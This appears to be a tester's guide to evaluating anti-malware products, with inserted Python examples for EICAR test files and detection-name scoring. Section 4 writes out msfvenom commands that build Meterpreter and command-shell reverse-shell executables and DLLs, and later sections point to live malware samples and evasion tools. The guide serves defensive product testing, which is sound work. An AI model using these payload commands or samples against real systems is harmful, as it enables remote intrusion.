The quality test against Anti-Malware Functionality
Author: Alex Huang (alex.huang@alumni.polyu.edu.hk)
References:
https://www.geckoandfly.com/24644/test-antivirus-security/
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
The quality test of anti-malware functionality can use the following methods: Dangerous API Testing, Testfile Testing, Online Testing, Customized Malware Testing, Real Malware Testing, and Malware Evasion Testing.
1)Dangerous API Testing:
The purpose of this test is to check whether the anti-malware system can pinpoint dangerous APIs being triggered.
The expected result is that the anti-malware system captures the attempts to call those dangerous APIs and confirms with the user whether the attempts are authorized.
Tools: https://www.spyshelter.com/security-test-tool/
Testing Items:
- Keylogging test
- Webcam capturing test
- Test Keystroke Encryption
- Screen capturing test
- Clipboard capturing test
- Sound recording test
- System protection test (Registry access, writing file to startup folder, service registering)
2)Anti-Malware Software Testfile Testing
EICAR is the abbreviation of the European Institute for Computer Antivirus Research, which proposes a test method by defining a string that anti-malware systems should treat as malicious, so that the effectiveness of those systems can be verified without a real malware sample.
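To make the testfile test concrete, the following is an added example (not part of the original document) that builds the standard EICAR test string, checks it against the EICAR format rules (the exact 68-byte string, optionally followed by whitespace, 128 bytes at most), wraps it in a ZIP archive so that archive scanning can be checked as well, and writes the variants to a directory to observe whether on-access protection removes them. The output directory, the file names and the two-part assembly of the string are the example's own choices; the SHA-256 constant is the published checksum of the 68-byte file.

```python
"""Build and validate the EICAR anti-malware test file in the forms a scanner
should catch: bare, with trailing whitespace, and inside a ZIP archive."""
import hashlib
import io
import os
import time
import zipfile

# The canonical 68-byte EICAR test string is assembled from two halves so that
# the script's own source is not flagged by an on-access scanner.
_EICAR_PART1 = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$"
_EICAR_PART2 = r"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
EICAR = _EICAR_PART1 + _EICAR_PART2

# Published SHA-256 of the bare 68-byte file; used to confirm the string above
# was transcribed correctly before it is used as a test input.
EICAR_SHA256 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"


def eicar_bytes(padding: int = 0) -> bytes:
    """Return the test string as bytes, optionally padded with trailing spaces.
    EICAR allows whitespace after the string up to 128 bytes in total; a longer
    file is outside the specification and scanners may legitimately ignore it."""
    if padding < 0 or 68 + padding > 128:
        raise ValueError("total length must be between 68 and 128 bytes")
    return EICAR.encode("ascii") + b" " * padding


def is_valid_eicar(data: bytes) -> bool:
    """Apply the rules a scanner applies: the first 68 bytes are the exact
    string, anything after it is whitespace, and the total is at most 128 bytes."""
    if len(data) > 128 or not data.startswith(EICAR.encode("ascii")):
        return False
    return all(c in b" \t\r\n" for c in data[68:])


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def eicar_zip(inner_name: str = "eicar.com") -> bytes:
    """Wrap the test file in a ZIP archive, the form used to check that the
    scanner inspects archive members rather than only top-level files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(inner_name, eicar_bytes())
    return buf.getvalue()


def zip_contains_eicar(data: bytes) -> bool:
    """True if any member of the archive is a valid EICAR test file."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(is_valid_eicar(zf.read(name)) for name in zf.namelist())


def write_test_set(directory: str, settle_seconds: float = 2.0) -> dict:
    """Write the three variants and report what happened to each. On-access
    protection usually blocks the write or removes the file within moments;
    a file that is still present points at a gap (no on-access scanning, or
    no archive scanning for the ZIP variant) that a manual scan should then confirm."""
    variants = {
        "eicar.com": eicar_bytes(),
        "eicar_padded.txt": eicar_bytes(60),   # 128 bytes, the maximum allowed
        "eicar_com.zip": eicar_zip(),
    }
    results = {}
    for name, data in variants.items():
        path = os.path.join(directory, name)
        try:
            with open(path, "wb") as fh:
                fh.write(data)
        except OSError as exc:             # blocked by the scanner at write time
            results[name] = f"blocked: {exc}"
            continue
        time.sleep(settle_seconds)         # give on-access scanning a moment
        results[name] = "still present" if os.path.exists(path) else "removed"
    return results


if __name__ == "__main__":
    assert sha256_hex(eicar_bytes()) == EICAR_SHA256, "test string mistyped"
    target = os.path.join(os.getcwd(), "eicar-test")   # example output directory
    os.makedirs(target, exist_ok=True)
    for variant, outcome in write_test_set(target).items():
        print(f"{variant:18s} {outcome}")
```

Run it on the machine whose protection is being evaluated; "removed" or "blocked" for all three variants is the expected outcome, while "still present" for only the ZIP variant indicates that archives are not scanned on access.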
3)Online Testing
The purpose of Online Testing is to determine whether the anti-malware system can uncover browser-based malware when the user downloads or browses to malicious payloads online.
Normally, an effective anti-malware system should pinpoint the malicious payloads and stop them from being executed.
Tools: https://www.wicar.org/test-malware.html
Testing Items:
- Downloading a testfile
- Verifying the existence of vulnerabilities
- Executing malicious payloads
4)Customized Malware Testing
Customized Malware Testing aims to confirm whether anti-malware systems can identify malware that has been customized.
In general, the malware should still be detected after being customized.
Tools: Msfvenom, JPS Virus Maker
Msfvenom Use Cases:
Executable with Meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe
Executable with Windows cmd:
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe
Windows DLL with Windows cmd:
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll
Execute Windows Command - generate a dll named shell32.dll that will pop calc when run:
msfvenom -f dll -p windows/exec CMD="C:\windows\system32\calc.exe" -o shell32.dll
5)Real Malware Sample Testing
There are some real malware samples that can be downloaded from the Internet. The basic idea of using real malware samples is to evaluate the identification accuracy of anti-malware systems.
In general, the name reported by the anti-malware system should be the same as or similar to the name shown on the website providing the download links.
Tools: https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/
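Comparing the reported detection name with the published name is harder than it sounds, because vendors prefix labels with platform and type tags and often use their own family names. The following added example (not part of the original document) normalizes detection labels, classifies how well each reported name agrees with the published one, and builds a per-scanner scorecard. The scan results, scanner names and alias table are constructed for illustration.

```python
"""Check whether the detection names reported by anti-malware scanners agree
with the names under which the samples were published."""
import re

# Vendor prefixes, platform tags and generic qualifiers that carry no family name.
_NOISE = {"trojan", "win32", "win64", "w32", "generic", "malware", "virus",
          "backdoor", "worm", "ransom", "ransomware", "downloader", "dropper",
          "agent", "gen", "variant", "heur", "suspicious", "pua", "a", "b", "c"}

# Constructed alias table: vendors use different family names for the same
# malware, so a different name does not automatically mean a wrong detection.
ALIASES = {"zeus": {"zbot"}, "cryptolocker": {"crilock"}}

# Constructed scan results: published sample name, then the label each scanner
# reported for it ("" means the scanner did not flag the sample at all).
SCAN_RESULTS = [
    ("Zeus",         {"ScannerA": "Trojan.Win32.Zeus.abc",  "ScannerB": "Zbot.Gen"}),
    ("Conficker",    {"ScannerA": "W32/Conficker.worm",     "ScannerB": ""}),
    ("CryptoLocker", {"ScannerA": "Ransom:Win32/Crilock.A", "ScannerB": "Trojan.Cryptolocker"}),
]


def family_tokens(label: str) -> set:
    """Lowercase a label such as 'Trojan.Win32.Zeus.abc' or 'W32/Conficker.worm',
    split it on the separators vendors use, and drop noise words and bare numbers."""
    tokens = re.split(r"[.\-/:!_\s]+", label.lower())
    return {t for t in tokens if t and t not in _NOISE and not t.isdigit()}


def name_match(published: str, reported: str, aliases: dict = None) -> str:
    """Classify agreement between the published name and a scanner label:
    'exact' if a family token is shared, 'alias' if the alias table links them,
    'partial' if one token is a prefix of the other (4 characters or more),
    'none' otherwise."""
    pub, rep = family_tokens(published), family_tokens(reported)
    if pub & rep:
        return "exact"
    aliases = aliases or {}
    if any(aliases.get(p, set()) & rep for p in pub):
        return "alias"
    if any(p in aliases.get(r, set()) for p in pub for r in rep):
        return "alias"
    for p in pub:
        for r in rep:
            if min(len(p), len(r)) >= 4 and (p.startswith(r) or r.startswith(p)):
                return "partial"
    return "none"


def scorecard(results, aliases: dict = None) -> dict:
    """Per scanner: how many samples were missed outright, and how the labels
    of the flagged samples compare with the published names."""
    card = {}
    for published, labels in results:
        for scanner, label in labels.items():
            entry = card.setdefault(
                scanner, {"missed": 0, "exact": 0, "alias": 0, "partial": 0, "none": 0})
            if not label:
                entry["missed"] += 1
            else:
                entry[name_match(published, label, aliases)] += 1
    return card


if __name__ == "__main__":
    for scanner, entry in scorecard(SCAN_RESULTS, ALIASES).items():
        print(scanner, entry)
```

Without the alias table, "Zbot.Gen" for the Zeus sample and "Ransom:Win32/Crilock.A" for the CryptoLocker sample are both scored as "none", which is exactly the kind of false "misidentification" a tester should resolve by looking up vendor naming before marking a scanner down.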
6)Malware Evasion Testing
This test determines whether malware that has been obfuscated by traditional evasion tools can still be detected by anti-malware systems.
Ideally, the malware should still be identified after being obfuscated by those evasion tools.
Tools: Veil, Venom, and Shellter